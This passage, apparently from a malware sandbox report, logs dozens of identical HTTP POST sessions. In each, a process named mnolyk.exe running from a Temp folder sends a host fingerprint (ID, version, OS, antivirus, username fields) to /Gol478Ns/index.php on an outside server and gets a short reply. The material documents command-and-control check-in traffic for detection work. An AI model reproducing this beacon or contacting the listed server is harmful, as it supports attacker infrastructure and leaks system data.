                                                                    Feb 8, 2023 21:31:37.353562117 CET272INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    72192.168.2.34977462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:37.538022041 CET273OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:37.601814032 CET273INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    73192.168.2.34977562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:37.801160097 CET274OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:37.866099119 CET274INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    74192.168.2.34977662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:38.042042017 CET274OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.105920076 CET275INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    75192.168.2.34977762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:38.278119087 CET276OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.343957901 CET276INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    76192.168.2.34977862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:38.510711908 CET277OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.572370052 CET277INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    77192.168.2.34977962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:38.749643087 CET278OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.814958096 CET278INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    78192.168.2.34978062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:38.981621027 CET279OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.047365904 CET279INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    79192.168.2.34978162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:39.216996908 CET280OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.282100916 CET280INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    8192.168.2.34970962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:11.416191101 CET208OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.481261015 CET209INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    80192.168.2.34978262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:39.471648932 CET281OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.536150932 CET281INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    81192.168.2.34978362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:39.747318029 CET282OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.810122013 CET282INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    82192.168.2.34978462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:39.982750893 CET283OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.048814058 CET283INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    83192.168.2.34978562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:40.215517998 CET284OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.279097080 CET284INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    84192.168.2.34978662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:40.457663059 CET285OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.520906925 CET285INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    85192.168.2.34978762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:40.714503050 CET286OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.777539968 CET286INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    86192.168.2.34978862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:40.954035997 CET287OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.018948078 CET287INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    87192.168.2.34978962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:41.224339962 CET288OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.289380074 CET288INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    88192.168.2.34979062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:41.465182066 CET289OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.529822111 CET289INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    89192.168.2.34979162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:41.723772049 CET290OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:41.787893057 CET290INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    9192.168.2.34971062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:11.651176929 CET209OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
